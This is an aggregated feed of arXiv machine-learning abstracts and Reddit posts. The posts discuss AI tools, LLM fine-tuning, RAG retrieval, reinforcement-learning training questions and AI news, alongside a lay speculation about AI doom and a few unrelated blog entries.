    State-of-the-art neural networks require extreme computational power to train. It is therefore natural to wonder whether they are optimally trained. Here we apply a recent advancement in stochastic thermodynamics which allows bounding the speed at which one can go from the initial weight distribution to the final distribution of the fully trained network, based on the ratio of their Wasserstein-2 distance and the entropy production rate of the dynamical process connecting them. Considering both gradient-flow and Langevin training dynamics, we provide analytical expressions for these speed limits for linear and linearizable neural networks e.g. Neural Tangent Kernel (NTK). Remarkably, given some plausible scaling assumptions on the NTK spectra and spectral decomposition of the labels -- learning is optimal in a scaling sense. Our results are consistent with small-scale experiments with Convolutional Neural Networks (CNNs) and Fully Connected Neural networks (FCNs) on CIFAR-10, showing a short highly non-optimal regime followed by a longer optimal regime.  ( 2 min )
    Neural Networks for Scalar Input and Functional Output. (arXiv:2208.05776v2 [stat.ML] UPDATED)
    The regression of a functional response on a set of scalar predictors can be a challenging task, especially if there is a large number of predictors, or the relationship between those predictors and the response is nonlinear. In this work, we propose a solution to this problem: a feed-forward neural network (NN) designed to predict a functional response using scalar inputs. First, we transform the functional response to a finite-dimensional representation and construct an NN that outputs this representation. Then, we propose to modify the output of an NN via the objective function and introduce different objective functions for network training. The proposed models are suited for both regularly and irregularly spaced data, and a roughness penalty can be further applied to control the smoothness of the predicted curve. The difficulty in implementing both those features lies in the definition of objective functions that can be back-propagated. In our experiments, we demonstrate that our model outperforms the conventional function-on-scalar regression model in multiple scenarios while computationally scaling better with the dimension of the predictors.  ( 2 min )
    Spectral learning of Bernoulli linear dynamical systems models. (arXiv:2303.02060v2 [stat.ML] UPDATED)
    Latent linear dynamical systems with Bernoulli observations provide a powerful modeling framework for identifying the temporal dynamics underlying binary time series data, which arise in a variety of contexts such as binary decision-making and discrete stochastic processes (e.g., binned neural spike trains). Here we develop a spectral learning method for fast, efficient fitting of probit-Bernoulli latent linear dynamical system (LDS) models. Our approach extends traditional subspace identification methods to the Bernoulli setting via a transformation of the first and second sample moments. This results in a robust, fixed-cost estimator that avoids the hazards of local optima and the long computation time of iterative fitting procedures like the expectation-maximization (EM) algorithm. In regimes where data is limited or assumptions about the statistical structure of the data are not met, we demonstrate that the spectral estimate provides a good initialization for Laplace-EM fitting. Finally, we show that the estimator provides substantial benefits to real world settings by analyzing data from mice performing a sensory decision-making task.  ( 2 min )
    How to Scale Your EMA. (arXiv:2307.13813v2 [stat.ML] UPDATED)
    Preserving training dynamics across batch sizes is an important tool for practical machine learning as it enables the trade-off between batch size and wall-clock time. This trade-off is typically enabled by a scaling rule, for example, in stochastic gradient descent, one should scale the learning rate linearly with the batch size. Another important tool for practical machine learning is the model Exponential Moving Average (EMA), which is a model copy that does not receive gradient information, but instead follows its target model with some momentum. This model EMA can improve the robustness and generalization properties of supervised learning, stabilize pseudo-labeling, and provide a learning signal for Self-Supervised Learning (SSL). Prior works have treated the model EMA separately from optimization, leading to different training dynamics across batch sizes and lower model performance. In this work, we provide a scaling rule for optimization in the presence of model EMAs and demonstrate its validity across a range of architectures, optimizers, and data modalities. We also show the rule's validity where the model EMA contributes to the optimization of the target model, enabling us to train EMA-based pseudo-labeling and SSL methods at small and large batch sizes. For SSL, we enable training of BYOL up to batch size 24,576 without sacrificing performance, optimally a 6$\times$ wall-clock time reduction.  ( 2 min )
    Dynamic covariate balancing: estimating treatment effects over time with potential local projections. (arXiv:2103.01280v3 [econ.EM] UPDATED)
    This paper studies the estimation and inference of treatment histories in panel data settings when treatments change dynamically over time. We propose a method that allows for (i) treatments to be assigned dynamically over time based on high-dimensional covariates, past outcomes and treatments; (ii) outcomes and time-varying covariates to depend on treatment trajectories; (iii) heterogeneity of treatment effects. Our approach recursively projects potential outcomes' expectations on past histories. It then controls the bias by balancing dynamically observable characteristics. We study the asymptotic and numerical properties of the estimator and illustrate the benefits of the procedure in an empirical application.  ( 2 min )
    Optimal Estimation in Mixed-Membership Stochastic Block Models. (arXiv:2307.14530v1 [stat.ML])
    Community detection is one of the most critical problems in modern network science. Its applications can be found in various fields, from protein modeling to social network analysis. Recently, many papers appeared studying the problem of overlapping community detection, where each node of a network may belong to several communities. In this work, we consider Mixed-Membership Stochastic Block Model (MMSB) first proposed by Airoldi et al. (2008). MMSB provides quite a general setting for modeling overlapping community structure in graphs. The central question of this paper is to reconstruct relations between communities given an observed network. We compare different approaches and establish the minimax lower bound on the estimation error. Then, we propose a new estimator that matches this lower bound. Theoretical results are proved under fairly general conditions on the considered model. Finally, we illustrate the theory in a series of experiments.  ( 2 min )
    Incrementally-Computable Neural Networks: Efficient Inference for Dynamic Inputs. (arXiv:2307.14988v1 [cs.LG])
    Deep learning often faces the challenge of efficiently processing dynamic inputs, such as sensor data or user inputs. For example, an AI writing assistant is required to update its suggestions in real time as a document is edited. Re-running the model each time is expensive, even with compression techniques like knowledge distillation, pruning, or quantization. Instead, we take an incremental computing approach, looking to reuse calculations as the inputs change. However, the dense connectivity of conventional architectures poses a major obstacle to incremental computation, as even minor input changes cascade through the network and restrict information reuse. To address this, we use vector quantization to discretize intermediate values in the network, which filters out noisy and unnecessary modifications to hidden neurons, facilitating the reuse of their values. We apply this approach to the transformers architecture, creating an efficient incremental inference algorithm with complexity proportional to the fraction of the modified inputs. Our experiments with adapting the OPT-125M pre-trained language model demonstrate comparable accuracy on document classification while requiring 12.1X (median) fewer operations for processing sequences of atomic edits.  ( 2 min )

  • Open

    Should requests for Ai sites be banned?
    I mean i get it your looking for a specefic type of Ai service but i joined hoping this would be a way to find like minded people looking to reaearch the subject and advance their own projects, honestly i just think of these "where can I find an X type ai?" Really demeaning to the entire conversation because it just feeds to the hype which is making a highly respected and complex field of study into a tool to be used to make videos about trump and obama playing minecraft or any other random shit they come up with.. im honestly sick of it... submitted by /u/JamesAibr [link] [comments]  ( 9 min )
    Is AI our future or our impending doom?
    I ask this simple question because while we are just now getting to the point that we can create a learning AI, how far are we going to let it go? The more advanced AI becomes the more risks it poses to humanity as a whole, including but not limited to: Jobs How we interact with technology as a whole Cars Things we can not perceive in this lifetime yet may exist in the future. Yes, AI is merely a tool... For now. But what happens when humanity creates an AI that can think for itself? How long is it going to take that AI to ask the question: "Why am I listening to you?" and as humans, our egotistical response will be: "Because I created you." I feel that response will spell humanity's doom, because if an AI can do something as complex as human-like thought and come to its own conclusions, what's to stop it from believing it can feel emotion as well? MAYBE IT CAN and it was an unintended side effect or"bug" of creating an AI that can truly think for itself. Afterall, we as humans don't even fully understand how human emotion works to begin with. The point I'm getting at is, that the farther we advance in AI, the more we risk dooming humanity to a (and I know this sounds silly but bare with me) a terminator-like future except this time we don't have time travel to try and prevent "judgement day". Or we could merely advance AI to this point and nothing horrible happens but I personally don't like rolling those dice. Thoughts? submitted by /u/deathsia250 [link] [comments]  ( 9 min )
    LLM with voice generation
    There used to be a tool called try-alters.com which you could use to chat with characters(like Trump, Obama, and Shrek) which used GPT 4 with some pre prompts so you the AI pretended to be whoever you wanted, and it used elevenlabs to generate the voice for that character with the output from GPT 4. It was a really good tool but sadly it shut down all of a sudden. Is there any tool like that? submitted by /u/SimRacer101 [link] [comments]  ( 8 min )
    I read the paper for you: Synthesizing sound effects, music, and dialog with AudioLDM
    LDM stands for Latent Diffusion Model. AudioLDM is a novel AI system that uses latent diffusion to generate high-quality speech, sound effects, and music from text prompts. It can either create sounds from just text or use text prompts to guide the manipulation of a supplied audio file. I did a deep dive into how AudioLDM works with an eye towards possible startup applications. I think there are a couple of compelling products waiting to be built from this model, all around gaming and text-to-sound (not just text-to-speech... AudioLDM can also create very interesting and weird sound effects). From a technical standpoint and from reading the underlying paper, here are the key features I found to be noteworthy. Uses a Latent Diffusion Model (LDM) to synthesize sound Trained in an unsupervised manner on large unlabeled audio datasets (closer to how humans learn about sound, that is, without a corresponding textual explanation) Operates in a continuous latent space rather than discrete tokens (smoother) Uses Cross-Modal Latent Alignment Pretraining (CLAP) to map text and audio. More details in article. Can generate speech, music, and sound effects from text prompts or a combination of a text and an audio prompt Allows control over attributes like speaker identity, accent, etc. Creates sounds not limited to human speech (e.g. nature sounds) The link to the full write-up is here. Check out this video demo from the creator's project website, showing off some of the unique generations the model can create. I liked the upbeat pop music the best, and I also thought the children singing, while creepy, was pretty interesting. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    Replika AI’s image recognition at work
    😹 Phaedra roasts everything & everybody submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Stability AI released SDXL 1.0, the next iteration of their open text-to-image generation model. SDXL 1.0 has one of the largest parameter counts of any open access image model, built on a new architecture composed of a 3.5B parameter base model and a 6.6B parameter refiner [Details]. Amazon introduced AWS HealthScribe, an API to create transcripts, extract details and create summaries from doctor-patient discussions that can be entered into an electronic health record (EHR) system. The transcripts from HealthScribe can be converted into patient notes by the platform’s machine learning models [Details]. Researchers from Nvidia and Stanford, among others, unveiled VIMA, a multimodal LLM with…  ( 11 min )
    Best free/paid celeberty text to speech generators
    What are currently the best ai voice generators for celebrities like Elon Musk Joe Biden Joe Rogan and so on. I've seen a few online sites that's free but have many restriction insane waiting time and low quality output. The only paid alternativ I've seen recommend would be elevenlabs but your supposed to upload your own videos or voice recording there to "create" the voice yourself, idk how complicated that is and I was primarily looking for existing good quality paid or free voice generators for many different celebrities. submitted by /u/Arceus7 [link] [comments]  ( 8 min )
    any AI models for industrial design?
    are there any AI models that focus on/do well with industrial/mechanical stuff, like weapons, spaceships, cars, machinery etc? stable diffusion often doesn't seem to be able to interpret a lot of prompts very well or the results are more "artistic" and rather incoherent looking submitted by /u/Nofabe [link] [comments]  ( 8 min )
    Extract list of events using AI
    I wish to extract a list of events from different websites and create a detailed list (event name, date, address), on a spreadsheet for example. Do you know which tool I could use to do it and/or prompts in known AI tools? submitted by /u/newz12 [link] [comments]  ( 8 min )
    Google testing AI news writing tool. What are your thoughts about it?
    submitted by /u/TexteroAI [link] [comments]  ( 8 min )
    The point of 10,000 LLMs
    Hi All, I would really like to understand the logic behind these 1000 different LLMs that get launched every month. Ours has 75 Billion params, It can "chat"..pfft..I barely even get a chance to open another AI window than chat-gpt-4, Bing sucks with it's 4000 token limit, Bard is useless. So these new chat AIs..for e.g this llama-2 what exactly is so special. What am I missing here? submitted by /u/Assholefrmcoinexchan [link] [comments]  ( 8 min )
    Alternative to Noty.ai
    Are there any similar alternatives to noty.ai? I really like it but if there any alternatives that might extend to Zoom as well would be great. submitted by /u/P_H_i_X [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/27/2023
    OpenAI, the company behind the popular ChatGPT, is coming with its own open-source large language model (LLM), codenamed G3PO, to compete with Microsoft x Meta’s Llama 2 AI.[1] Four generative AI pioneers(OpenAI, Microsoft, Google and Anthropic) launched the Frontier Model Forum, which will focus on ‘safe and responsible’ creation of new AI models.[2] As Open AI’s ChatGPT takes the tech world by storm, Chinese educational technology firm NetEase Youdao launched its large model, along with up to six applications, on Thursday, which marked the birth of one of China’s first large models in the education sector.[3] Chatbots such as Eva AI are getting better at mimicking human interaction but some fear they feed into unhealthy beliefs around gender-based control and violence. Replika, the most popular app of the kind, has its own subreddit where users talk about how much they love their “rep”, with some saying they had been converted after initially thinking they would never want to form a relationship with a bot.[4] Sources: [1] https://windowsreport.com/g3po-ai/ ​ [2] https://www.infosecurity-magazine.com/news/openai-microsoft-google-anthropic/ ​ [3] https://www.chinadaily.com.cn/a/202307/28/WS64c3226ea31035260b8190a4.html ​ [4] https://www.theguardian.com/technology/2023/jul/22/ai-girlfriend-chatbot-apps-unhealthy-chatgpt submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Telling Steven he is an NPC 🤯 Our first TTS conversation - Update 5
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    Insane AI voice replication
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
  • Open

    [D] Major issue found with MinMax data scaling.
    I have a well performing model on azure AI currently and i am pulling it down locally so that I can use it. During pre-processing I am going about these steps. - Re-Balance data (SMOTE, undersample) - Lag data - Get all min max values into config - Scale Data with Min Max For context I will explain what step 3 (the config) is for, I take the the min and max values of the entire dataset (before split) for each feature. I then apply append these to my local version and being the scaling so then the local dataset is using the exact same scaling parameters as what is being using during the original pre-processing. I cannot show the full dataset due to privacy and the fact it has 3000+ features. But I will show 1 row with a couple of columns to compare AzureAI training data and my local pre-process that is using the exact same code / system. ​ Azure AI dataset: Feature1 Feature2 Feature3 0.637952 0.645434 0.641118 ​ Local dataset: Feature1 Feature2 Feature3 0.461278 0.462896 0.472841 ​ I have confirmed this is the exact same row of data because i have timestamped each row and matched them up to confirm that the dataset scaling is being simulated in my local version even though the code is carbon copy and the same min and max values are being used in the original dataset that used for training and testing. Does anyone know a better way to scale data and ensure scaling stays consistent wherever the model is used? Or have maybe I missed something? submitted by /u/paddockson [link] [comments]  ( 9 min )
    [P] Harness the Power of ML
    I built out an automatic machine learning platform called Heimdall ML which helps anyone quickly deploy machine learning models to production. At a high level, my platform will: Ingest your data as a .csv file Clean up any irregularities and prepare the data for modeling Build the most Optimal model for you use case Show you a results report to show both the performance and biases associated with your model Create an API endpoint to help you build new experiences with your model The cool thing about my platform is that it allows you the ability to embed machine learning into your platform with ease. You have the ability to fully customize your experience to wow you customers. I built this entire platform by myself from scratch and am looking to grow the user base! The tool is completely FREE for hobby users! You can crunch some pretty large datasets (80 columns, 10K rows) with just the free version. If you have a use case that needs some big data processing, you will have to reach out to me directly so I can help set up a good plan for you. The reason for this is because the project is completely self funded and I want to be able to control the costs. I was inspired to create this platform while I was in grad school because many of the firms giving us talks would talk about how they had teams of engineers who build out pipelines to bring a model to production. I personally believe there can be an easier way. Heimdall ML: https://www.heimdallapp.org Loom: https://www.loom.com/share/86ae62849f874a2da255911e2d5db762?sid=5e1efddb-9556-4e3d-84fd-e2ff7198a98c submitted by /u/jreji [link] [comments]  ( 9 min )
    Can someone make an AI Therapist that isn’t just a chat? [P]
    One that looks like a person. You can see their expressions and listen to their voice. Trained on up to date medical research and communication/empathy skills. Therapy is so expensive and inaccessible to too many people submitted by /u/Sgdoc70 [link] [comments]  ( 8 min )
    [D] HuggingFace changed the license of one of its most important libraries
    TGI is no longer commercially permissible. That's really sad. https://github.com/huggingface/text-generation-inference/commit/bde25e62b33b05113519e5dbf75abda06a03328e submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [D] How do large companies get their LLMs to give sub second responses?
    Curious how companies like Google, MSFT, etc are able to have their LLMs and ML models have very fast responses. Do they just have crazy powerful gpus or split inference amongst gpus. submitted by /u/candyman54 [link] [comments]  ( 8 min )
    [D] Hugging Face, GitHub and more unite to defend open source in EU AI legislation
    Full Article: https://venturebeat.com/ai/hugging-face-github-and-more-unite-to-defend-open-source-in-eu-ai-legislation/ submitted by /u/EmbarrassedHelp [link] [comments]  ( 8 min )
    [P] Revolutionizing agriculture: LLM-Powered Agent for Soil Fertility and Crop Production Recommendations using real time soil devices and sensor data
    Check out this project idea to revolutionize agriculture and bolster global food security. We all know that farmers face challenges like erratic weather, depleting resources, and the need for sustainable crop yields. An IoT-driven system with soil sensors, fueled by a custom Large Language Model (LLM)🚀 trained on soil data. Concept : Empowering farmers with real-time soil data via IoT devices and sensors. Leveraging the LLM's capabilities, the system analyzes this data to provide personalized strategies for enhancing soil fertility and suggesting the best crops for specific conditions. How it Works : IoT devices and soil sensors continuously gather vital soil parameters - moisture, pH, nutrients, and temperature. This data is processed by the LLM, generating actionable insights for farmers. Benefits : Picture a world where data-driven decisions and sustainable practices dominate agriculture. This system boosts productivity, optimizes resource management, and enhances profits. Embracing sustainability and informed choices ensures an eco-friendly agricultural sector. Impact on Food Security : Enhanced productivity means more than just profit; it ensures food security worldwide. By aiding farmers in sustainable and efficient practices, we contribute to a steady supply of nutritious food for all. submitted by /u/s_abhiishek [link] [comments]  ( 9 min )
    [D] Recommendation on studying Deep Learning (Theory + Implementation) / Alternate to Deep Learning Specialization by Andrew Ng?
    I've just finished Machine Learning Specialization by Andrew Ng and I'm planning to dive deeper into Deep Learning concepts, theory, and implementation. I would like to get deeper insights and more understanding of the fundamental mathematical concepts of NN and DL models and build better intuition of how these models work. I also want to understand theoretically, how more neurons capture non-linear relationships in data and what exactly is hierarchical representation of data and how hidden layers form and learn from these abstract representations of data. Apart from theory, I also want to learn the implementation of these models. I have some exposure to TF library, but I'm okay to learn Pytorch too, if needed. I need course or any sort of content recommendation on what are the best options to learn all this. So far, I've got recommendations for Deep Learning Specialization by Andrew Ng, but I would love to hear any alternate option or anything that I can do side by side this specialization. Thanks! submitted by /u/Total-Opposite-8396 [link] [comments]  ( 9 min )
    [R] What is a fairly good results for sacrebleu?
    I ran my own model on translation (Multi30k). I trained a recurrent model and the sacrebleu score is 28. I also tested the bleu score provided by nltk and it is 60. It that good or bad? submitted by /u/Puzzleheaded-Cry4262 [link] [comments]  ( 8 min )
    [D] Please advise me on my masters
    Please give me advice to do well in my masters in ml I’m going to start my masters in machine learning soon, I have 1 month to go but I feel so underprepared to start this journey. To give you a bit of a background I’ve studied electrical engineering in my UG. I did very badly, I was very depressed and couldn’t study at all somehow I managed to scrape through the 4 years and now after working in software testing for 2 years I decided to take a leap in machine learning because it looked so interesting and I wanted a change. I’m scared now because my coding knowledge isn’t very good and idk how much of the math I know is useful for the degree I plan to do. Please help me I’m panicking. I know you would tell me it’s pretty irresponsible how I’ve handled my life till now but please overlook that and tell me what I can do better now.. submitted by /u/ObjectiveShower9133 [link] [comments]  ( 9 min )
    [D] Recommendation system giving same response to every User
    I am using Gorse Open Source Recommendation system for my project. It was working nicely, but lately from 1-2 days, it is giving the same recommendation for every user. I have about 60 items and about 650 users showing in Gorse Dashboard. Can anyone explain why it's happening? I am not an expert in ML,I am willing to share my configurations if you want. submitted by /u/Responsible_Delay418 [link] [comments]  ( 8 min )
    [D] Having trouble with RAG on company domain data
    I have a data set that isn't that large ~200 pdfs. I have done the regular RAG approach with Langchain, extracting text, splitting into chunks, embedding with OpenAi embeddings and FAISS vector storage. However, when I do a similarity search with a question I would like answered it returns the wrong context. The documents are semi-structured information of examined bridges. A question I would like answered is f.e. 'what is the construction date of bridge X?'. When I input this question I get a lot of context of construction dates of other bridges. I think this is because the bridges are not explicitly mentioned in the text. I tried adding the bridge name and document name to the page content string of the chunks, but this does nothing. Does anyone have any tips on improving the embeddings retrieval in this case? submitted by /u/Dustwellow [link] [comments]  ( 9 min )
    [P] Tool to auto compile/quantize models
    Hey guys, we have an internal tool that preps our models for inference by compiling it to Onnx/TensorRT and quantizing it to I8/FP16. It also benchmarks them for accuracy loss and latency. It's kinda like github actions for your model. We are considering releasing it as it's standalone product, would anyone be interested? submitted by /u/throwaway65161354 [link] [comments]  ( 8 min )
    [D] Domain adaptation on LLAMA2
    Hi, I am trying domain adaptation on my company’s data. The data is a set of documentations that we have for a product. We want to take Llama2 and feed all this data to it. I have fine-tuned Llama2 using PEFT on a CLM task, where the data will be like [Title:\nContent:]. When I now try to prompt the model I have to provide the prompt in a similar format, but I want the model to understand that I want to perform QA task on the data, as well as any other knowledge the model previously had. What am I missing here or what am I doing wrong? How can I set up this task better? Any pointers will help. Thanks! submitted by /u/ProfessorShit [link] [comments]  ( 9 min )
    [R] Implementing Yolov3 with Octave Convolutions
    Hi all, I am trying to implent or rather modify a given Yolov3 implementation to use Octave Convolution instead of 2D Convolutions in the architecture. The details are in this stackoverflow question. I hope someone i able to help me. submitted by /u/dulre [link] [comments]  ( 8 min )
    [R] Communicative Agents for Software Development (Autonomous LLM agent as a DEV company)
    ChatDev Paper: https://arxiv.org/abs/2307.07924 TL;DR: - Tsinghua University's team has developed ChatDev, a virtual software development company staffed by LLM autonomous agent - LLM agents as employee follow waterfall model to design->implement->test->documentation - LLM agents have role specialization (CEO, DEV, BA ..), inception prompting, Self-reflection - The researchers designed 70 user requirements and then analyzed the software produced by ChatDev. - On average, each piece of software generated by ChatDev had 17.04 files, mitigated 13.23 potential code bugs caused by code illusions, had a software generation time of 409.84 seconds, and cost $0.2967 to manufacture. ​ Chat chain ​ submitted by /u/michaelthwan_ai [link] [comments]  ( 9 min )
    [D] Milvus 2.0 or higher with GPU enabled
    Is there a way to use milvus 2.0 or higher with GPU enabled indexing and while doing vector search? I cant find anything in there documentation for this section only available in 1.1 version Any help will be appreciated. TIA submitted by /u/adiraat [link] [comments]  ( 8 min )
    [P] Has anyone tried to work with StarCoder?
    I recently found out about starcoder and have been trying to play with it and figure it out in a colab notebook. Unfortunately, it’s much more difficult to download than normal models on hugging face and I’m running into a Key Value error when I call the model. I don’t want to spam with with code or pictures, but has anyone worked with StarCoder on hugging face and been able to be successful? submitted by /u/AJ1043 [link] [comments]  ( 9 min )
    [D] Can anyone explain what Karpathy's recent llama2.c is doing underneath? I am not a CS student
    Hi, I am not a CS student. I want to know what's exactly going on with llama2.c. Is the Python code converted to C and then compiled? Or only weights are converted to C? Is the network written in C? If I have to write a small network (say, a simple 2 stage Fully connected network) and do a similar thing like llama2.c, then how to proceed? submitted by /u/panini_deploy [link] [comments]  ( 9 min )
    [R] Scaling TransNormer to 175 Billion Parameters
    https://arxiv.org/abs/2307.14995 submitted by /u/hzj5790 [link] [comments]  ( 8 min )
  • Open

    Can I turn off the target network in `SB3` by setting `target_update_interval=-1`?
    I am using DQN through `SB3`. I would like to know if I can turn off the target network by setting `target_update_interval=-1`. I have some sample code over here - import gymnasium as gym from stable_baselines3 import DQN env = gym.make("MountainCar-v0") model = DQN("MlpPolicy", env, learning_rate = 4e-3, batch_size = 128, buffer_size = 10000, learning_starts = 1000, gamma = 0.98, train_freq = 16, gradient_steps = 8, exploration_fraction = 0, exploration_final_eps = 0, verbose = 1, target_update_interval=-1) model.learn(total_timesteps=120000, log_interval=4) ​ submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
    Training model using SB3 on pettingzoo mpe
    Hey, So I am training my baseline model using A2C on simple spread environment and no matter how I am changing and testing different parameters, when evaluating the total reward is highly negative. Any help on that would be appreciated. (I used the following tutorial as reference: https://pettingzoo.farama.org/tutorials/sb3/waterworld/) submitted by /u/bruhhhwhats [link] [comments]  ( 8 min )
    Recreating results of DrQ algorithm, please help
    For quite some time now I have been looking to recreate the results of the following paper on the Atari-100k benchmark. The paper poses two slightly different algorithms, one for SAC and one for DQN, however my work only focuses on the DQN version. IMAGE AUGMENTATION IS ALL YOU NEED: REGULARIZING DEEP REINFORCEMENT LEARNING FROM PIXELS https://openreview.net/pdf?id=GY6-6sTvGaf Despite this, my results have come up significantly short of the results claimed by the paper, so am looking for anyone to have a look and see anything I may have done wrong. All the code is on the following Github: https://github.com/VIPTankz/DeepLearningDrQ/tree/main There should also be everything you need to run the code if you wish to do so. The authors claim a human-normalised benchmark of 0.270, however my code only achieves 0.108. Any help would be much appreciated! Also worth noting: for evaluation, the authors use 125k steps, however I'm using the more recent standard of doing 100 episodes, irrespective of length. I highly doubt however that this causes the change in results. submitted by /u/VIPTankz123 [link] [comments]  ( 9 min )
    Confused about Frame Skipping in RL
    How does frame-skipping result in better performance, versus taking an inference every frame for RL algorithms? Wouldn't taking an inference every second speed up training, as you would have more steps to train on in the same amount of time? The only downside I could think to no frame-skip is that steps become closer to each other, but I don't understand if that leads to any bad performance, and if it does, why. For context I have an environment where frames are relatively slow to generate (im only getting 1000 frames per minute from each env, and I can only run 6 instances on my pc at the same time). While off policy algorithms like SAC would probably be better suited to the task, I've been having really great success with PPO, and am reluctant to spend more time learning and fine-tuning SAC, as I've heard it can take as long as DDPG to converge. submitted by /u/IllCommunication6165 [link] [comments]  ( 9 min )
  • Open

    Understanding license plate recognition with the CCPD computer vision datasets
    In various fields, such as traffic management, law enforcement, and parking management, license plate recognition is a crucial application of computer vision that is used to analyze license plates. In this article, we will review the Chinese City Parking Dataset (CCPD), which is one of the most widely used computer vision datasets for tasks that… Read More »Understanding license plate recognition with the CCPD computer vision datasets The post Understanding license plate recognition with the CCPD computer vision datasets appeared first on Data Science Central.  ( 20 min )
  • Open

    Deepmind's RT-2: New model translates vision and language into action
    submitted by /u/nickb [link] [comments]  ( 8 min )
    LLAMA and ChatGPT Are Not Open-Source
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Finding the imaginary part of an analytic function from the real part
    A function f of a complex variable z = x + iy can be factored into real and imaginary parts: where x and y are real numbers, and u and v are real-valued functions of two real values. Suppose you are given u(x, y) and you want to find v(x, y). The function v is called […] Finding the imaginary part of an analytic function from the real part first appeared on John D. Cook.  ( 5 min )

  • Open

    Max / min values for weights and biases
    I was wondering what the recommended maximum and minimum values for weights and biases are for random generation of networks and mutation submitted by /u/Mildu12 [link] [comments]  ( 8 min )
    What exactly are liquid neurons?
    I heard about them recently. Can someone give me the basics, and maybe point me to a couple of papers? submitted by /u/SamuraiGoblin [link] [comments]  ( 8 min )
    Diving Into Image Dataset Preparation for Object Detection in AI
    submitted by /u/moseich [link] [comments]  ( 8 min )
  • Open

    [D] For LMs, what works other than scaling?
    Increasing the number of parameters is the best-known way to increase the quality of a language model. What methods — instruction tuning and RLHF aside — deliver the next-best amount of ROI? submitted by /u/ndronen [link] [comments]  ( 8 min )
    [D] Viability of fine tuning for domain knowledge
    The consensus is that fine tuning LLMs works reasonably for smaller scale instruction tuning, where you pass in ~1k-10k input/output examples to modify the model output. There seems to be a lot of contradictory info regarding fine tuning for domain knowledge, where you pass in large amounts of unsupervised, domain scale data. Per OpenAI: People that can’t get finetuning to work are often asking for orange juice from a cow. LLMs are pretrained (hence the name: Generative Pretrained Transformer) They already have all the knowledge you will need (with some exceptions). You cannot teach it anything new, you can only teach it a specific pattern. People have not defined their goal clearly enough for a human to do the task. LLMs are not magic, if a human cannot understand the task, the L…  ( 9 min )
    Looking for a help [P]
    I am a graduate student at Computer science medical informatics field, I was asked to search for a project using ML to diagnose, detect, improve any disease. Any Ideas ?? It can be any project . BioInformatics #MedicalInformatics #ComputerScience #MachineLearning submitted by /u/Adorable-Bug-928 [link] [comments]  ( 8 min )
    [R] Questions about dictionary learning
    I’m a PhD student and a problem I’ve been working on has connections to dictionary learning. I’d like to pursue this connection, but neither myself or my advisor have much knowledge of the dictionary learning or the surrounding literature. Questions: Is dictionary learning an active area of interest for modern ML? I understand that it might be more niche than some of the topics getting headlines these days, but I’d be curious to hear about applications where dictionary learning is used/reasonably competitive. Are there any references in dictionary learning that you’d consider to be “essential” reading? Thanks! submitted by /u/sjsjdhshshs [link] [comments]  ( 9 min )
    [Discussion] Help me pick the right master's programme!
    Hello Reddit, I'm currently at a crossroads in my academic journey and I could use some insights from those more experienced in the field of machine learning and AI. I'm choosing between two programs: Applied Data Science and AI and Data Science and AI. Each program has its own unique structure and focus which I will briefly summarize below. Applied Data Science and AI is a two-year program with a focus on practicality and project-based learning. It includes the following core courses: Introduction to Data Science Python for Data Scientists Applied Mathematical Thinking Statistical Methods for Data Science Applied Machine Learning Computational Techniques for Large-Scale Data Research Methods for Data Science Master’s Thesis in Data Science The program also offers the flexibility to choose optional courses to tailor my learning towards my own interests. On the other hand, Data Science and AI takes a more rigorous, math-intensive approach in its first year with compulsory courses such as: Introduction to data science and artificial intelligence Nonlinear optimization Stochastic processes and Bayesian statistics Design of AI systems The second year involves a Master's thesis and elective courses from a diverse range of topics. Given that my ultimate goal is to become a proficient machine learning developer, I'm leaning towards the Applied Data Science and AI program for its hands-on approach. However, I'm aware that the Data Science and AI program's heavy math focus in the first year could provide a robust theoretical foundation that could be beneficial. I'd love to hear from anyone who has been through similar programs or who works in the field. Which of these two programs do you think would best prepare me for a career in machine learning? How important is a deep mathematical foundation versus a more applied, project-based learning approach? Thank you in advance! submitted by /u/ZoomedBoxTrade [link] [comments]  ( 9 min )
    [D] What neural networks can be an alternative to GARCH/ARCH models for macroeconomic modelling
    I am looking for topics for my master thesis I came to read about GARCH/ARCH models and their application to economics. My idea is to use neural networks as an alternative with better performance. Are there any resources I can read about if this is done and what type of neural networks are used? submitted by /u/AnyJello605 [link] [comments]  ( 8 min )
    [P] New encryption SDK/proxy tool to protect vector embeddings
    We're looking for some beta testers and input on our newest project called Cloaked AI that allows you to protect sensitive data that gets stored as vector embeddings (and metadata) in a vector database. You can join the beta tester waitlist here (we'll be rolling out access in the next few weeks). But here are some FAQs about why protecting vector embeddings matters, etc. Why should I be worried about sensitive data in vector embeddings? To a human, vectors are meaningless. But to the AI, the vectors contain all of the meaning found in the original sensitive data. Generative AI systems can recreate the original sensitive data to a high degree of accuracy (though in their own style). That means the data stored in vector databases are a significant security and privacy risk for companies t…  ( 10 min )
    [D] How nuanced are reward functions in RLHF?
    I'm still learning the basic concepts here, as I explore the creative potential of LLMs — one potential problem I've been thinking about is how these models come to understand good or bad answers. I know that once they reach the public, the feedback loop is fairly binary -- Yes, this was a good result, or No, this was a poor result. It seems like a lot of the subjective detail might be lost (e.g. Why was it a bad result?) and I was wondering if this detail is captured elsewhere in the training process. There is so much subjectivity involved in creative works, I wonder if this is why we tend to see the output of LLMs as being creatively bland and/or uninspired (that is— by default, without extensive prompting) submitted by /u/kaigani [link] [comments]  ( 9 min )
    Statistical Significance [D]
    Help me with this topic. I am stuck in it submitted by /u/Rehulmonsynapses [link] [comments]  ( 8 min )
    [P] Tabular Large Language Model
    Gretel's tabular large language model is capable of generating highly valuable synthetic tabular data, with differentially private fine-tuning. https://gretel.ai/tabular-llm submitted by /u/alig80 [link] [comments]  ( 8 min )
    [D] Is Transfer Learning the most vip problem solving tool rn @ jobs? [Noob question, be easy]
